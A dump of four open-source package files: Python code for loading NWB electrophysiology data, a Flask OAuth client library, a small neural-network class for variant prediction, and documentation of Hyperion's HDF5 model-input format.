id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
/IPFX-1.0.8.tar.gz/IPFX-1.0.8/ipfx/dataset/create.py | from typing import Optional, Dict, Any
import re
from pathlib import Path
import h5py
import numpy as np
import allensdk.core.json_utilities as ju
from ipfx.dataset.ephys_data_set import EphysDataSet
from ipfx.stimulus import StimulusOntology
from ipfx.dataset.hbg_nwb_data import HBGNWBData
from ipfx.dataset.mies_nwb_data import MIESNWBData
from ipfx.string_utils import to_str
from ipfx.dataset.labnotebook import LabNotebookReaderIgorNwb
def get_scalar_value(dataset_from_nwb):
"""
Some values in NWB are stored as scalar whereas others as np.ndarrays with
dimension 1. Use this function to retrieve the scalar value itself.
"""
if isinstance(dataset_from_nwb, np.ndarray):
return dataset_from_nwb.item()
return dataset_from_nwb
def is_file_mies(path: str) -> bool:
with h5py.File(path, "r") as fil:
if "generated_by" in fil["general"].keys():
generated_by = dict(fil["general"]["generated_by"][:])
return generated_by.get("Package", "None") == "MIES"
return False
def get_nwb_version(nwb_file: str) -> Dict[str, Any]:
"""
Find version of the nwb file
Parameters
----------
nwb_file
Returns
-------
dict in the format:
{
`major`: str
`full` str.
}
"""
with h5py.File(nwb_file, 'r') as f:
if "nwb_version" in f: # In version 0 and 1 this is a dataset
nwb_version = get_scalar_value(f["nwb_version"][()])
nwb_version_str = to_str(nwb_version)
if nwb_version is not None and re.match("^NWB-", nwb_version_str):
return {
"major": int(nwb_version_str[4]),
"full": nwb_version_str
}
elif "nwb_version" in f.attrs: # in version 2 this is an attribute
nwb_version_str = to_str(f.attrs["nwb_version"])
if nwb_version_str is not None and (
re.match("^2", nwb_version_str) or
re.match("^NWB-2", nwb_version_str)
):
return {"major": 2, "full": nwb_version_str}
return {"major": None, "full": None}
def create_ephys_data_set(
nwb_file: str,
sweep_info: Optional[Dict[str, Any]] = None,
ontology: Optional[str] = None
) -> EphysDataSet:
"""
Create an ephys data set with the appropriate nwbdata reader class
Parameters
----------
nwb_file
sweep_info
ontology
Returns
-------
EphysDataSet
"""
nwb_version = get_nwb_version(nwb_file)
is_mies = is_file_mies(nwb_file)
if not ontology:
ontology = StimulusOntology.DEFAULT_STIMULUS_ONTOLOGY_FILE
if isinstance(ontology, (str, Path)):
ontology = StimulusOntology(ju.read(ontology))
if nwb_version["major"] == 2:
if is_mies:
labnotebook = LabNotebookReaderIgorNwb(nwb_file)
nwb_data = MIESNWBData(nwb_file, labnotebook, ontology)
else:
nwb_data = HBGNWBData(nwb_file, ontology)
else:
raise ValueError(
"Unsupported or unknown NWB major version {} ({})".format(
nwb_version["major"], nwb_version["full"]
)
)
return EphysDataSet(
sweep_info=sweep_info,
data=nwb_data,
) | PypiClean |
/Flask_OAuthlib-0.9.6-py3-none-any.whl/flask_oauthlib/client.py | import logging
import oauthlib.oauth1
import oauthlib.oauth2
from copy import copy
from functools import wraps
from oauthlib.common import to_unicode, PY3, add_params_to_uri
from flask import request, redirect, json, session, current_app
from werkzeug.urls import url_quote, url_decode, url_encode
from werkzeug.http import parse_options_header
from werkzeug.utils import cached_property
from .utils import to_bytes
try:
from urlparse import urljoin
import urllib2 as http
except ImportError:
from urllib import request as http
from urllib.parse import urljoin
log = logging.getLogger('flask_oauthlib')
if PY3:
string_types = (str,)
else:
string_types = (str, unicode)
__all__ = ('OAuth', 'OAuthRemoteApp', 'OAuthResponse', 'OAuthException')
class OAuth(object):
"""Registry for remote applications.
:param app: the app instance of Flask
Create an instance with Flask::
oauth = OAuth(app)
"""
state_key = 'oauthlib.client'
def __init__(self, app=None):
self.remote_apps = {}
self.app = app
if app:
self.init_app(app)
def init_app(self, app):
"""Init app with Flask instance.
You can also pass the instance of Flask later::
oauth = OAuth()
oauth.init_app(app)
"""
self.app = app
app.extensions = getattr(app, 'extensions', {})
app.extensions[self.state_key] = self
def remote_app(self, name, register=True, **kwargs):
"""Registers a new remote application.
:param name: the name of the remote application
:param register: whether the remote app will be registered
Find more parameters from :class:`OAuthRemoteApp`.
"""
remote = OAuthRemoteApp(self, name, **kwargs)
if register:
assert name not in self.remote_apps
self.remote_apps[name] = remote
return remote
def __getattr__(self, key):
try:
return object.__getattribute__(self, key)
except AttributeError:
app = self.remote_apps.get(key)
if app:
return app
raise AttributeError('No such app: %s' % key)
_etree = None
def get_etree():
global _etree
if _etree is not None:
return _etree
try:
from lxml import etree as _etree
except ImportError:
try:
from xml.etree import cElementTree as _etree
except ImportError:
try:
from xml.etree import ElementTree as _etree
except ImportError:
raise TypeError('lxml or etree not found')
return _etree
def parse_response(resp, content, strict=False, content_type=None):
"""Parse the response returned by :meth:`OAuthRemoteApp.http_request`.
:param resp: response of http_request
:param content: content of the response
:param strict: strict mode for form urlencoded content
:param content_type: assign a content type manually
"""
if not content_type:
content_type = resp.headers.get('content-type', 'application/json')
ct, options = parse_options_header(content_type)
if ct in ('application/json', 'text/javascript'):
if not content:
return {}
return json.loads(content)
if ct in ('application/xml', 'text/xml'):
return get_etree().fromstring(content)
if ct != 'application/x-www-form-urlencoded' and strict:
return content
charset = options.get('charset', 'utf-8')
return url_decode(content, charset=charset).to_dict()
def prepare_request(uri, headers=None, data=None, method=None):
"""Make request parameters right."""
if headers is None:
headers = {}
if data and not method:
method = 'POST'
elif not method:
method = 'GET'
if method == 'GET' and data:
uri = add_params_to_uri(uri, data)
data = None
return uri, headers, data, method
def encode_request_data(data, format):
if format is None:
return data, None
if format == 'json':
return json.dumps(data or {}), 'application/json'
if format == 'urlencoded':
return url_encode(data or {}), 'application/x-www-form-urlencoded'
raise TypeError('Unknown format %r' % format)
class OAuthResponse(object):
def __init__(self, resp, content, content_type=None):
self._resp = resp
self.raw_data = content
self.data = parse_response(
resp, content, strict=True,
content_type=content_type,
)
@property
def status(self):
"""The status code of the response."""
return self._resp.code
class OAuthException(RuntimeError):
def __init__(self, message, type=None, data=None):
self.message = message
self.type = type
self.data = data
def __str__(self):
if PY3:
return self.message
return self.message.encode('utf-8')
def __unicode__(self):
return self.message
class OAuthRemoteApp(object):
"""Represents a remote application.
:param oauth: the associated :class:`OAuth` object
:param name: the name of the remote application
:param base_url: the base url for every request
:param request_token_url: the url for requesting new tokens
:param access_token_url: the url for token exchange
:param authorize_url: the url for authorization
:param consumer_key: the application specific consumer key
:param consumer_secret: the application specific consumer secret
:param request_token_params: an optional dictionary of parameters
to forward to the request token url
or authorize url depending on oauth
version
:param request_token_method: the HTTP method that should be used for
the access_token_url. Default is ``GET``
:param access_token_params: an optional dictionary of parameters to
forward to the access token url
:param access_token_method: the HTTP method that should be used for
the access_token_url. Default is ``GET``
:param access_token_headers: additonal headers that should be used for
the access_token_url.
:param content_type: force to parse the content with this content_type,
usually used when the server didn't return the
right content type.
.. versionadded:: 0.3.0
:param app_key: lazy load configuration from Flask app config with
this app key
"""
def __init__(
self, oauth, name,
base_url=None,
request_token_url=None,
access_token_url=None,
authorize_url=None,
consumer_key=None,
consumer_secret=None,
rsa_key=None,
signature_method=None,
request_token_params=None,
request_token_method=None,
access_token_params=None,
access_token_method=None,
access_token_headers=None,
content_type=None,
app_key=None,
encoding='utf-8',
):
self.oauth = oauth
self.name = name
self._base_url = base_url
self._request_token_url = request_token_url
self._access_token_url = access_token_url
self._authorize_url = authorize_url
self._consumer_key = consumer_key
self._consumer_secret = consumer_secret
self._rsa_key = rsa_key
self._signature_method = signature_method
self._request_token_params = request_token_params
self._request_token_method = request_token_method
self._access_token_params = access_token_params
self._access_token_method = access_token_method
self._access_token_headers = access_token_headers or {}
self._content_type = content_type
self._tokengetter = None
self.app_key = app_key
self.encoding = encoding
# Check for required authentication information.
# Skip this check if app_key is specified, since the information is
# specified in the Flask config, instead.
if not app_key:
if signature_method == oauthlib.oauth1.SIGNATURE_RSA:
# check for consumer_key and rsa_key
if not consumer_key or not rsa_key:
raise TypeError(
"OAuthRemoteApp with RSA authentication requires "
"consumer key and rsa key"
)
else:
# check for consumer_key and consumer_secret
if not consumer_key or not consumer_secret:
raise TypeError(
"OAuthRemoteApp requires consumer key and secret"
)
@cached_property
def base_url(self):
return self._get_property('base_url')
@cached_property
def request_token_url(self):
return self._get_property('request_token_url', None)
@cached_property
def access_token_url(self):
return self._get_property('access_token_url')
@cached_property
def authorize_url(self):
return self._get_property('authorize_url')
@cached_property
def consumer_key(self):
return self._get_property('consumer_key')
@cached_property
def consumer_secret(self):
return self._get_property('consumer_secret')
@cached_property
def rsa_key(self):
return self._get_property('rsa_key')
@cached_property
def signature_method(self):
return self._get_property('signature_method')
@cached_property
def request_token_params(self):
return self._get_property('request_token_params', {})
@cached_property
def request_token_method(self):
return self._get_property('request_token_method', 'GET')
@cached_property
def access_token_params(self):
return self._get_property('access_token_params', {})
@cached_property
def access_token_method(self):
return self._get_property('access_token_method', 'POST')
@cached_property
def content_type(self):
return self._get_property('content_type', None)
def _get_property(self, key, default=False):
attr = getattr(self, '_%s' % key)
if attr is not None:
return attr
if not self.app_key:
if default is not False:
return default
return attr
app = self.oauth.app or current_app
if self.app_key in app.config:
# works with dict config
config = app.config[self.app_key]
if default is not False:
return config.get(key, default)
return config[key]
# works with plain text config
config_key = "%s_%s" % (self.app_key, key.upper())
if default is not False:
return app.config.get(config_key, default)
return app.config[config_key]
def get_oauth1_client_params(self, token):
params = copy(self.request_token_params) or {}
if token and isinstance(token, (tuple, list)):
params["resource_owner_key"] = token[0]
params["resource_owner_secret"] = token[1]
# Set params for SIGNATURE_RSA
if self.signature_method == oauthlib.oauth1.SIGNATURE_RSA:
params["signature_method"] = self.signature_method
params["rsa_key"] = self.rsa_key
return params
def make_client(self, token=None):
# request_token_url is for oauth1
if self.request_token_url:
# get params for client
params = self.get_oauth1_client_params(token)
client = oauthlib.oauth1.Client(
client_key=self.consumer_key,
client_secret=self.consumer_secret,
**params
)
else:
if token:
if isinstance(token, (tuple, list)):
token = {'access_token': token[0]}
elif isinstance(token, string_types):
token = {'access_token': token}
client = oauthlib.oauth2.WebApplicationClient(
self.consumer_key, token=token
)
return client
@staticmethod
def http_request(uri, headers=None, data=None, method=None):
uri, headers, data, method = prepare_request(
uri, headers, data, method
)
log.debug('Request %r with %r method' % (uri, method))
req = http.Request(uri, headers=headers, data=data)
req.get_method = lambda: method.upper()
try:
resp = http.urlopen(req)
content = resp.read()
resp.close()
return resp, content
except http.HTTPError as resp:
content = resp.read()
resp.close()
return resp, content
def get(self, *args, **kwargs):
"""Sends a ``GET`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'GET'
return self.request(*args, **kwargs)
def post(self, *args, **kwargs):
"""Sends a ``POST`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'POST'
return self.request(*args, **kwargs)
def put(self, *args, **kwargs):
"""Sends a ``PUT`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'PUT'
return self.request(*args, **kwargs)
def delete(self, *args, **kwargs):
"""Sends a ``DELETE`` request. Accepts the same parameters as
:meth:`request`.
"""
kwargs['method'] = 'DELETE'
return self.request(*args, **kwargs)
def patch(self, *args, **kwargs):
"""Sends a ``PATCH`` request. Accepts the same parameters as
:meth:`post`.
"""
kwargs['method'] = 'PATCH'
return self.request(*args, **kwargs)
def request(self, url, data=None, headers=None, format='urlencoded',
method='GET', content_type=None, token=None):
"""
Sends a request to the remote server with OAuth tokens attached.
:param data: the data to be sent to the server.
:param headers: an optional dictionary of headers.
:param format: the format for the `data`. Can be `urlencoded` for
URL encoded data or `json` for JSON.
:param method: the HTTP request method to use.
:param content_type: an optional content type. If a content type
is provided, the data is passed as it, and
the `format` is ignored.
:param token: an optional token to pass, if it is None, token will
be generated by tokengetter.
"""
headers = dict(headers or {})
if token is None:
token = self.get_request_token()
client = self.make_client(token)
url = self.expand_url(url)
if method == 'GET':
assert format == 'urlencoded'
if data:
url = add_params_to_uri(url, data)
data = None
else:
if content_type is None:
data, content_type = encode_request_data(data, format)
if content_type is not None:
headers['Content-Type'] = content_type
if self.request_token_url:
# oauth1
uri, headers, body = client.sign(
url, http_method=method, body=data, headers=headers
)
else:
# oauth2
uri, headers, body = client.add_token(
url, http_method=method, body=data, headers=headers
)
if hasattr(self, 'pre_request'):
# This is designed for some rubbish services like weibo.
# Since they don't follow the standards, we need to
# change the uri, headers, or body.
uri, headers, body = self.pre_request(uri, headers, body)
if body:
data = to_bytes(body, self.encoding)
else:
data = None
resp, content = self.http_request(
uri, headers, data=to_bytes(body, self.encoding), method=method
)
return OAuthResponse(resp, content, self.content_type)
def authorize(self, callback=None, state=None, **kwargs):
"""
Returns a redirect response to the remote authorization URL with
the signed callback given.
:param callback: a redirect url for the callback
:param state: an optional value to embed in the OAuth request.
Use this if you want to pass around application
state (e.g. CSRF tokens).
:param kwargs: add optional key/value pairs to the query string
"""
params = dict(self.request_token_params) or {}
params.update(**kwargs)
if self.request_token_url:
token = self.generate_request_token(callback)[0]
url = '%s?oauth_token=%s' % (
self.expand_url(self.authorize_url), url_quote(token)
)
if params:
url += '&' + url_encode(params)
else:
assert callback is not None, 'Callback is required for OAuth2'
client = self.make_client()
if 'scope' in params:
scope = params.pop('scope')
else:
scope = None
if isinstance(scope, str):
# oauthlib need unicode
scope = _encode(scope, self.encoding)
if 'state' in params:
if not state:
state = params.pop('state')
else:
# remove state in params
params.pop('state')
if callable(state):
# state can be function for generate a random string
state = state()
session['%s_oauthredir' % self.name] = callback
url = client.prepare_request_uri(
self.expand_url(self.authorize_url),
redirect_uri=callback,
scope=scope,
state=state,
**params
)
return redirect(url)
def tokengetter(self, f):
"""
Register a function as token getter.
"""
self._tokengetter = f
return f
def expand_url(self, url):
return urljoin(self.base_url, url)
def generate_request_token(self, callback=None):
# for oauth1 only
if callback is not None:
callback = urljoin(request.url, callback)
client = self.make_client()
client.callback_uri = _encode(callback, self.encoding)
realm = self.request_token_params.get('realm')
realms = self.request_token_params.get('realms')
if not realm and realms:
realm = ' '.join(realms)
uri, headers, _ = client.sign(
self.expand_url(self.request_token_url),
http_method=self.request_token_method,
realm=realm,
)
log.debug('Generate request token header %r', headers)
resp, content = self.http_request(
uri, headers, method=self.request_token_method,
)
data = parse_response(resp, content)
if not data:
raise OAuthException(
'Invalid token response from %s' % self.name,
type='token_generation_failed'
)
if resp.code not in (200, 201):
message = 'Failed to generate request token'
if 'oauth_problem' in data:
message += ' (%s)' % data['oauth_problem']
raise OAuthException(
message,
type='token_generation_failed',
data=data,
)
tup = (data['oauth_token'], data['oauth_token_secret'])
session['%s_oauthtok' % self.name] = tup
return tup
def get_request_token(self):
assert self._tokengetter is not None, 'missing tokengetter'
rv = self._tokengetter()
if rv is None:
raise OAuthException('No token available', type='token_missing')
return rv
def handle_oauth1_response(self, args):
"""Handles an oauth1 authorization response."""
client = self.make_client()
client.verifier = args.get('oauth_verifier')
tup = session.get('%s_oauthtok' % self.name)
if not tup:
raise OAuthException(
'Token not found, maybe you disabled cookie',
type='token_not_found'
)
client.resource_owner_key = tup[0]
client.resource_owner_secret = tup[1]
uri, headers, data = client.sign(
self.expand_url(self.access_token_url),
_encode(self.access_token_method)
)
headers.update(self._access_token_headers)
resp, content = self.http_request(
uri, headers, to_bytes(data, self.encoding),
method=self.access_token_method
)
data = parse_response(resp, content)
if resp.code not in (200, 201):
raise OAuthException(
'Invalid response from %s' % self.name,
type='invalid_response', data=data
)
return data
def handle_oauth2_response(self, args):
"""Handles an oauth2 authorization response."""
client = self.make_client()
remote_args = {
'code': args.get('code'),
'client_secret': self.consumer_secret,
'redirect_uri': session.get('%s_oauthredir' % self.name)
}
log.debug('Prepare oauth2 remote args %r', remote_args)
remote_args.update(self.access_token_params)
headers = copy(self._access_token_headers)
if self.access_token_method == 'POST':
headers.update({'Content-Type': 'application/x-www-form-urlencoded'})
body = client.prepare_request_body(**remote_args)
resp, content = self.http_request(
self.expand_url(self.access_token_url),
headers=headers,
data=to_bytes(body, self.encoding),
method=self.access_token_method,
)
elif self.access_token_method == 'GET':
qs = client.prepare_request_body(**remote_args)
url = self.expand_url(self.access_token_url)
url += ('?' in url and '&' or '?') + qs
resp, content = self.http_request(
url,
headers=headers,
method=self.access_token_method,
)
else:
raise OAuthException(
'Unsupported access_token_method: %s' %
self.access_token_method
)
data = parse_response(resp, content, content_type=self.content_type)
if resp.code not in (200, 201):
raise OAuthException(
'Invalid response from %s' % self.name,
type='invalid_response', data=data
)
return data
def handle_unknown_response(self):
"""Handles a unknown authorization response."""
return None
def authorized_response(self, args=None):
"""Handles authorization response smartly."""
if args is None:
args = request.args
if 'oauth_verifier' in args:
data = self.handle_oauth1_response(args)
elif 'code' in args:
data = self.handle_oauth2_response(args)
else:
data = self.handle_unknown_response()
# free request token
session.pop('%s_oauthtok' % self.name, None)
session.pop('%s_oauthredir' % self.name, None)
return data
def authorized_handler(self, f):
"""Handles an OAuth callback.
.. versionchanged:: 0.7
@authorized_handler is deprecated in favor of authorized_response.
"""
@wraps(f)
def decorated(*args, **kwargs):
log.warn(
'@authorized_handler is deprecated in favor of '
'authorized_response'
)
data = self.authorized_response()
return f(*((data,) + args), **kwargs)
return decorated
def _encode(text, encoding='utf-8'):
if encoding:
return to_unicode(text, encoding)
return text | PypiClean |
/CombiVEP-0.1.2.tar.gz/CombiVEP-0.1.2/combivep/engine/mlp.py | import numpy as np
import combivep.settings as combivep_settings
class Mlp(object):
"""MultiLayer Perceptron class"""
def __init__(self, n_features,
seed=combivep_settings.DEFAULT_SEED,
n_hidden_nodes=combivep_settings.DEFAULT_HIDDEN_NODES):
object.__init__(self)
#set initial configuration values and memorize input
self.__n_features = n_features
self.__n_hidden_nodes = n_hidden_nodes
self.best_weights1 = []
self.best_weights2 = []
#set initial values of weight matrixs to random small values
np.random.seed(seed)
self.__weights1 = 0.01 * np.random.rand(n_hidden_nodes, self.__n_features+1)
self.__weights2 = 0.01 * np.random.rand(1, n_hidden_nodes+1)
#set initial values of momentum matrixs to zeros
self.__momentums1 = np.zeros((n_hidden_nodes, self.__n_features+1))
self.__momentums2 = np.zeros((1, n_hidden_nodes+1))
def forward_propagation(self, dataset):
#calculate sum of product in the hidden layer
in1 = np.dot(self.__weights1,
np.concatenate((dataset.feature_vectors,
np.ones((1, dataset.n_data))
),
axis=0
)
)
#calculate outputs of hidden layer using non-linear function
self.__out1 = np.concatenate((2/(1+np.exp(-in1))-1,
np.ones((1, dataset.n_data))
),
axis=0
)
#calculate sum of product in the output node
in2 = np.dot(self.__weights2, self.__out1)
#calculate output of mlp using non-linear function
self.__out2 = 1/(1+np.exp(-in2))
#return prediction result
return self.__out2
def backward_propagation(self, training_dataset):
model_error = self.calculate_error(self.__out2, training_dataset.targets)
self.__error_signal_output = np.multiply(model_error,
np.multiply((1-self.__out2),
self.__out2
)
)
self.__error_signal_hidden = np.multiply(np.dot(self.__weights2.T,
self.__error_signal_output
),
np.multiply((1+self.__out1),
(1-self.__out1)
)
) * 0.5
self.__error_signal_hidden = self.__error_signal_hidden[0:self.__n_hidden_nodes]
return np.sum(np.absolute(model_error), axis=1).item(0)
def weight_update(self, training_dataset, coefficient=combivep_settings.MLP_COEFFICIENT, step_size=combivep_settings.STEP_SIZE):
self.__momentums1 = np.subtract((self.__momentums1*coefficient),
(np.dot(self.__error_signal_hidden,
np.concatenate((training_dataset.feature_vectors,
np.ones((1, training_dataset.n_data))
),
axis=0
).T
)
)*(1-coefficient)
)
self.__momentums2 = np.subtract((self.__momentums2*coefficient),
(np.dot(self.__error_signal_output,
self.__out1.T
)
)*(1-coefficient)
)
self.__weights1 = np.add(self.__weights1, np.multiply(self.__momentums1,
step_size)
)
self.__weights2 = np.add(self.__weights2, np.multiply(self.__momentums2,
step_size)
)
return self.__weights1, self.__weights2
def calculate_error(self, actual_output, expected_output):
return np.subtract(actual_output, expected_output)
def export_best_parameters(self, params_file=combivep_settings.USER_PARAMETERS_FILE):
np.savez(params_file, best_weights1=self.best_weights1, best_weights2=self.best_weights2)
def import_parameters(self, params_file=combivep_settings.USER_PARAMETERS_FILE):
params = np.load(params_file)
self.__weights1 = params['best_weights1']
self.__weights2 = params['best_weights2']
def get_weights1(self):
"""for unit testing purpose"""
return self.__weights1 | PypiClean |
/Hyperion-0.9.10.tar.gz/Hyperion-0.9.10/docs/advanced/model_file.rst | =======================
Model Input HDF5 Format
=======================
.. _input_intro:
Introduction
============
The radiation transfer code reads in an HDF5 file as input. The contents of the file have to follow a specific layout. To differentiate this format from other HDF5 files, we use the ``.rtin`` extension for input files to the radiation transfer code.
An ``.rtin`` file should contain the following four groups::
Dust/
Grid/
Sources/
Output/
These are described in `Dust`_, `Grid`_, `Sources`_, and `Output`_
respectively. In addition, a number of attributes should be set at the root level, and these are described in `Root-level attributes`_.
Dust
====
The `Dust`_ group should contain as many groups (or external/internal links
to groups) as dust types. The groups should be named::
dust_001/
dust_002/
...
Each group should have the layout described in :doc:`dust_file` or should be an external HDF5 link to an actual dust file.
Grid
====
The **Grid** group should contain two sub-groups, **Geometry**, and **Physics**, which are described below.
Geometry
--------
This group describes the geometry of the model (what type of grid is used, and
the position of the cell walls). The group should have an attribute, ``grid_type``, giving the type of grid as a string which can be:
* ``car``: cartesian grid
* ``sph_pol``: spherical polar grid
* ``cyl_pol``: cylindrical polar grid
* ``amr``: adaptive mesh refinement grid (AMR)
* ``oct``: octree grid
The content of the group then depends on the type of grid:
Cartesian (``car``)
^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``x`` giving the x position of the
cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``y`` and ``z`` respectively, giving the
y and z position of the grid cell walls.
Spherical Polar (``sph_pol``)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``r`` giving the radial position of
the cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``t`` and ``p`` respectively, giving the
theta and phi position of the grid cell walls.
Cylindrical Polar (``cyl_pol``)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
The **Geometry** group should contain three tabular datasets named ``walls_1``,
``walls_2``, and ``walls_3``, which should each contain one column. The
``walls_1`` table should contain a column ``w`` giving the radial position of
the cell walls as floating point values. Similarly, ``walls_2`` and ``walls_3``
should contain one column each, named ``z`` and ``p`` respectively, giving the
z and phi position of the grid cell walls.
AMR (``amr``)
^^^^^^^^^^^^^
The **Geometry** group should contain an attribute ``nlevels`` giving the
number of levels in the grid, as an integer, as well as one sub-group per
level. These groups should be formatted as **level_%05d** (i.e.
**level_00001**, **level_00002**, etc.) starting at **level_00001**.
Each **level_*** group should then contain an attribute ``ngrids`` giving the number of grids in the level, as an integer, as well as one sub-group per grid in the level. The sub-groups should be formatted as ``grid_%05d`` (e.g. **grid_00001**, **grid_00002**) starting at **grid_00001**.
Each **grid_*** group should contain the following attributes:
* ``xmin``, ``xmax``, ``ymin``, ``ymax``, ``zmin``, ``zmax``: the boundaries of
the grid, as floating point values.
* ``n1``, ``n2``, ``n3``: the number of cells (not walls) in each direction, as
integers.
Octree (``oct``)
^^^^^^^^^^^^^^^^
The **Geometry** group should contain the following attributes:
* ``x``, ``y``, ``z``: the coordinates of the center of the parent cell, as floating point values, in cm
* ``dx``, ``dy``, ``dz``: the size of the parent cell, as floating point values, in cm
In addition, the group should contain a 1-d array representing the ``refined`` array described in :doc:`indepth_oct`. The array should be given as an integer array instead of a boolean array.
Physics
-------
This group describes the input quantities such as the density and optionally
the specific energy of the dust. In all cases where a ``density`` array should be specified, you may also give a ``specific_energy`` array with the same dimensions - this can be used as the initial temperature, or can be used as the temperature to use for the images/SED if the number of temperature iterations is set to zero.
Cartesian
^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_z, n_y, n_x)``.
Spherical Polar
^^^^^^^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_p, n_t, n_r)``.
Cartesian
^^^^^^^^^
The **Physics** group should contain a 4-d dataset array named ``density`` giving the density in c.g.s in each cell. The dimensions of the array should be ``(n_dust, n_p, n_z, n_w)``.
AMR
^^^
The **Physics** group should contain a structure similar to that used to
represent the geometry. The ``nlevels`` and ``ngrids`` attributes are not
needed, only the nested **level_*** and **grid_*** groups. Each **grid_***
group should then contain a 4-d dataset array named ``density`` giving the
density in c.g.s in each cell. The dimensions of the array should be ``(n_dust,
n_z, n_y, n_x)``.
Octree
^^^^^^
The **Physics** group should contain a 1-d dataset array named ``density`` giving the density in c.g.s in each cell. Each cell in this array should match a cell in the ``refined`` array discussed in `Geometry`_.
Sources
=======
This should contain one group per source. The name of the
groups is not important, and the Python code uses names such as
**source_00001**. Each sub-group will contain certain attributes and datasets depending on the source type, as described below.
Common attributes
-----------------
All sources should have the following attributes:
* ``type``: the type of the source, given as a string. This can be ``point``
(for point sources), ``sphere`` (for spherical sources), ``map`` (for diffuse
sources), ``extern_sph`` (for external spherical illumination),
``extern_box`` (for external illumination from a box), or ``plane_parallel``
(for a plane-parallel beam).
* ``luminosity``: the luminosity of the source, as a floating point value, in
c.g.s
* ``peeloff``: whether to include the source when computing images with
peeling-off, as a string that should be either ``yes`` or ``no``.
* ``spectrum``: the type of spectrum to use, as a string. This can be either:
* ``spectrum``, to indicate that a spectrum has been numerically specified.
In this case, the group representing the source should also contain a
tabular dataset with two columns: ``nu``, the frequency in Hz, and ``fnu``,
the monochromatic flux per frequency (the exact units are not important,
because the spectrum is renormalized).
* ``temperature``, to specify that a temperature has been specified. In this
case, the temperature should be given as an attribute ``temperature``, as a
floating-point value.
* ``lte``, to indicate that the source should emit from the dust emissivities
in the cell (this is used mainly for diffuse sources). In this case, no
addition attributes need to be specified.
Point sources (``point``)
-------------------------
A group representing a point source should contain the following attributes in
addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the source, as floating
point values, in cm
Spherical sources (``sphere``)
------------------------------
A group representing a spherical source should contain the following attributes
in addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
* ``limb``: whether to include limb darkening, as a string that can be either
``yes`` or ``no``.
.. TODO: mention spots
Diffuse sources (``map``)
-------------------------
In addition to the `Common attributes`_ discussed above, a group representing a diffuse source should contain a dataset called ``Luminosity map`` containing the relative luminosity of each cell as a 3-d array. The dimensions of the grid should be identical to the density grid (see `Grid`_).
External spherical sources (``extern_sph``)
-------------------------------------------
A group representing external illumination from a spherical source should
contain the following attributes in addition to the `Common attributes`_
discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
External box sources (``extern_box``)
-------------------------------------
A group representing external illumination from a box source should contain the
following attributes in addition to the `Common attributes`_ discussed above:
* ``xmin``, ``xmax``, ``ymin``, ``ymax``, ``zmin``, ``zmax``: the lower and upper bounds definining the box, as floating-point values, in cm.
Plane parallel sources (``plane_parallel``)
-------------------------------------------
A group representing a plane-parallel beam source should contain the following
attributes in addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
* ``theta``, ``phi``: the 3-d angle giving the direction of the beam in
spherical polar coordinates, as floating point values, in degrees.
.. TODO: mention point source collection
Output
======
The ``Output`` group should have four attributes `output_density`,
`output_density_diff`, `output_n_photons`, and `output_specific_energy`, which
should be set to a string to indicate whether to output the quantity after the
last iteration (``last``), after every iteration (``all``), or never
(``none``). The ``density_diff`` quantity is the density difference compared to
the input density (which will be non-zero in cases for example where one uses
dust sublimation).
In addition, the ``Output`` group should contain two sub-groups, ``Binned`` and
``Peeled``, that can be used to specify the parameters of the output
images/SEDs. Both groups should always be present, even if they are empty. The content of these groups is described in the following two sections:
Binned
------
If you want to compute images using binning of escaping photons (not
recommended in most cases as it is inefficient and causes angle-averaging of
outputs), then set the ``n_theta`` and ``n_phi`` parameters, which should be
used to indicate, as integers, the number of bins in the theta and phi
directions respectively.
Peeled
------
This group should contain as many sub-groups as image/SED sets you want to
compute (the name of the sub-groups is unimportant). Each sub-group should then
contain the following attributes:
* ``n_view``: the number of viewing angles for the image/SED, given as an
integer.
* ``compute_image``: whether to compute images, given as a string that can be
``yes`` or ``no``. If this is ``yes``, then the following attributes should
also be specified:
* ``n_x`` and ``n_y``: the dimensions of the image, as integers
* ``x_min``, ``x_max``, ``y_min``, and ``y_max``: the lower and upper bounds
of the image as floating point values, in cm
* ``compute_sed``: whether to compute SEDs, given as a string that can be
``yes`` or ``no``. If this is ``yes``, then the following attributes should
also be specified:
* ``n_ap``: the number of apertures to compute the SED for
* ``ap_min``, ``ap_max``: the smallest and largest apertures to use. If
``n_ap`` is 1, then ``ap_min`` should be the same as ``ap_max``.
* ``track_origin``: indicates whether the origin of the photon (e.g. emission
vs scattering, or which source it originated from) should be retained in the
output image. This can be:
* ``no``: no photon tracking is done
* ``basic``: photons are split into ones emitted or scattered, and whether
they were last emitted from a source or from the dust.
* ``detailed``: as for ``basic``, but also keeping the ID of the source or
dust population last emitted from.
* ``scatterings``: photons are split into ones emmitted by sources or dust,
and split by the number of times they scatter.
* ``track_n_scat``: an integer giving the maximum number of scatterings to
record if ``track_origin`` is set to ``scatterings``.
* ``uncertainties``: whether to compute and output uncertainties on the images
and/or SEDs. This should be specified as a string that can be ``yes`` or
``no``.
